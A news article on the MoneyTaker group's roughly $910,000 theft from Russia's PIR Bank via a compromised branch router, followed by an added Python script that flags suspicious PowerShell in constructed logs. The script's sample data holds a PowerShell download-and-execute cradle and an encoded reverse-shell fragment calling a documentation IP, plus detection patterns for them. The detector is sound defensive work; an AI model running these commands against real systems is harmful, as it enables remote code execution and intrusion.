Hacker group steals $1 million from a Russian bank.
The attackers entered the bank's network through a vulnerable router.
A Russian cyber security firm is investigating the incident.
The hacker group known as 'MoneyTaker' stole $910,000 from a bank, this time Russia's PIR Bank. The hackers first gained access to the bank's network through a vulnerable router.
How did the hacker group attack the bank?
The Russian cyber security firm Group-IB is investigating the incident and has confirmed that the attack on PIR Bank began in late May 2018. The entry point was a compromised router used by one of the bank's regional branches. The router had tunnels configured that gave the attackers direct access to the bank's local network. This technique is characteristic of MoneyTaker: the group has used the same scheme at least three times before when attacking banks with regional branch networks.
To establish persistence in the bank's systems and automate some stages of the attack, the MoneyTaker group traditionally uses PowerShell scripts, a technique Group-IB experts analysed in detail in their December report. Once the criminals had penetrated the bank's main network, they gained access to the AWS CBR (Automated Work Station Client of the Russian Central Bank), generated payment orders and sent the money in several tranches to mule accounts prepared in advance.
The group tried to clear all logs from the infected computers, but the investigation team still found 'reverse shell' programs that connected out from the bank's network to the hackers' servers and waited for new commands, so the attackers could return and regain access to the network. The group also used fileless malware, which is not stored on hard drives but exists only in computer memory.
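The two traits described above, PowerShell used for persistence and reverse shells that call out from the bank's network, leave traces in process-creation logs even when the attackers later wipe files from disk. The script below is an added example written for this article, not code from Group-IB or from the incident; it runs over constructed process-creation events in a hypothetical key=value format, decodes PowerShell's -EncodedCommand argument (base64 over UTF-16LE) and flags command lines carrying reverse-shell or download-cradle indicators. The hostnames, user names and the 198.51.100.7 address are invented.

```python
"""Flag PowerShell command lines with reverse-shell or download-cradle
indicators. Added example; every log line here is constructed, not real."""
import base64
import re

# Constructed reverse-shell one-liner, encoded the way PowerShell's
# -EncodedCommand expects (base64 over UTF-16LE). 198.51.100.7 is a
# documentation address, not a real attacker host.
_PAYLOAD = '$c = New-Object System.Net.Sockets.TCPClient("198.51.100.7", 4444)'
ENCODED_PAYLOAD = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (hypothetical format: key=value, cmd last).
SAMPLE_LOGS = [
    f'2018-05-28T10:12:03Z host=BR-WS01 user=svc_backup cmd="powershell.exe '
    f'-NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED_PAYLOAD}"',
    '2018-05-28T10:15:44Z host=BR-WS01 user=jdoe cmd="powershell.exe -File C:\\scripts\\backup.ps1"',
    '2018-05-28T10:20:01Z host=BR-WS02 user=admin cmd="notepad.exe C:\\Users\\admin\\notes.txt"',
    '2018-05-28T11:02:17Z host=BR-WS02 user=admin cmd="powershell.exe -nop -w hidden -c '
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\"",
]

# Weak indicators describe how PowerShell was launched; strong ones describe
# what it was asked to do (open a socket, fetch and run remote code).
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
}
STRONG = {"tcp_client", "invoke_expression", "download_cradle"}

_ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
_EVENT_RE = re.compile(r'host=(\S+)\s+user=(\S+)\s+cmd="(.*)"$')


def decode_encoded_command(cmd):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = _ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line):
    """Return a finding dict for a suspicious event, or None for benign/unparsable lines."""
    m = _EVENT_RE.search(line)
    if not m:
        return None
    host, user, cmd = m.groups()
    decoded = decode_encoded_command(cmd)
    # Match indicators against the raw command line and the decoded payload.
    haystack = cmd + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    if any(h in STRONG for h in hits):
        severity = "high"
    elif len(hits) >= 2:
        severity = "medium"
    else:
        return None
    return {"host": host, "user": user, "severity": severity,
            "indicators": hits, "decoded": decoded}


def scan(lines):
    """Run analyze() over every line and keep only the findings."""
    return [f for f in map(analyze, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

Decoding the encoded argument matters: the socket-opening call in the first sample is invisible to a plain string match on the raw command line, and a real log pipeline should keep the decoded text alongside the event so analysts can see what was executed after the attackers have cleaned the disk.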
It is not the first time!
According to a Group-IB report from last November, the cyber criminal group has attacked legal entities in the US, UK and Russia, including banks and financial institutions. The report says the hackers stole approximately $14 million: sixteen targets among US organisations, three attacks on Russian banks and one on a UK software company.